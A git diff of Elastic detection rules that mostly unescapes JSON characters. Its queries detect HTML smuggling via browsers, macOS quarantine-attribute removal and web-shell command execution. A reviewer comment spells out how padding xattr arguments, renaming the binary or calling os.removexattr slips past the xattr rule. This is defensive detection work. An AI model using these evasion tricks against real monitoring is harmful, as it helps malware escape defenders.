where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", "related_integrations": [ { "package": "endpoint", @@ -72,7 +72,7 @@ ], "risk_score": 47, "rule_id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", 
@@ -83,7 +83,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -110,7 +110,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_102.json b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_102.json
index 8999840f148..9e483ea6d30 100644
--- a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_102.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_103.json b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_103.json
index 83875113a72..d328d40ea9a 100644
--- a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_103.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_104.json b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_104.json
index 249d42a7f2f..cf989761e39 100644
--- a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_104.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_205.json b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_205.json
index b56034f1009..0348f657069 100644
--- a/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/f06414a6-f2a4-466d-8eba-10f85e8abf71_205.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_102.json b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_102.json
index 2aeee8c9e86..18f744c8fc9 100644
--- a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_102.json
@@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Attempt to Remove File Quarantine Attribute", "note": "", - "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count \u003e 12\n", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n", "references": [ "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://ss64.com/osx/xattr.html" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
@@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_103.json b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_103.json index b692ce9faef..21a5777a1d9 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_103.json +++ b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_103.json @@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Attempt to Remove File Quarantine Attribute", "note": "", - "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count \u003e 12\n", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n", "references": [ "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://ss64.com/osx/xattr.html" 
@@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_104.json b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_104.json index faf434998b1..ae37d5ba5c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_104.json 
@@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Attempt to Remove File Quarantine Attribute", "note": "", - "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count \u003e 12\n", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n", "references": [ "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://ss64.com/osx/xattr.html" @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", 
@@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_105.json b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_105.json index 95415e86c87..d951da0cbb6 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_105.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Attempt to Remove File Quarantine Attribute", - "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count \u003e 12\n", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n", "references": [ "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://ss64.com/osx/xattr.html" 
@@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_106.json b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_106.json index f48e53b48a6..5781ef04cdf 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_106.json +++ b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_106.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Attempt to Remove File Quarantine Attribute", - "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count \u003e 12\n", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n", "references": [ "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", "https://ss64.com/osx/xattr.html" @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_101.json b/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_101.json index 40d480bec14..81ecda6ea14 100644 --- a/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_101.json +++ b/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_101.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
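Review bot: The new-side `query` in the `@@ -11,7` hunk keeps the trailing `) and not process.args_count > 12`, which means any `xattr -d com.apple.quarantine <file>` or `xattr -c <file>` invocation padded with more than twelve operands is silently excluded, so the cap reads as an evasion path rather than a tuning decision; xattr appears to process each operand independently, so appending extra paths would presumably still strip the attribute from the real target (confirm on a test host). The `(process.args : "-c")` branch also fires on any `xattr -c` regardless of which attribute is cleared, which is a deliberate over-match but is not explained anywhere in the visible fields. Since this hunk only unescapes `\u003e` to `>`, the fix belongs in the upstream rule source: either drop the clause, or if it exists to suppress noisy bulk invocations, document that rationale in the rule's `description` or a `false_positives` entry so analysts understand why high-arity calls are excluded, e.g. a sentence such as "Invocations with more than 12 arguments are excluded to reduce noise from bulk attribute clearing; attackers may pad argument lists to evade." Either way, matching only on `process.name : "xattr"` will not catch a copied or renamed binary or an `os.removexattr` call from a scripting runtime, which is worth stating in the same place.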
diff --git a/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_102.json b/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_102.json
index a868508a4d6..8853764b1c1 100644
--- a/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/f0bc081a-2346-4744-a6a4-81514817e888_102.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_102.json b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_102.json
index 986fa8a9851..cdf5297521f 100644
--- a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_102.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_103.json b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_103.json
index 1636bd47327..bed8b78f50e 100644
--- a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_103.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -89,7 +89,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_104.json b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_104.json
index e5c3011c744..7e1388897fd 100644
--- a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_104.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_105.json b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_105.json
index 32f13146c73..c8a5ba2e6f3 100644
--- a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_105.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_1.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_1.json
index 415ece7e617..f47f01e99cd 100644
--- a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_1.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -94,7 +94,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_2.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_2.json
index a6244d65493..5e02359a15b 100644
--- a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_2.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -94,7 +94,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_3.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_3.json
index 4ce741c0292..cc76b21630e 100644
--- a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_3.json
@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Code Execution via Web Server", - "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. 
A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. 
This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. 
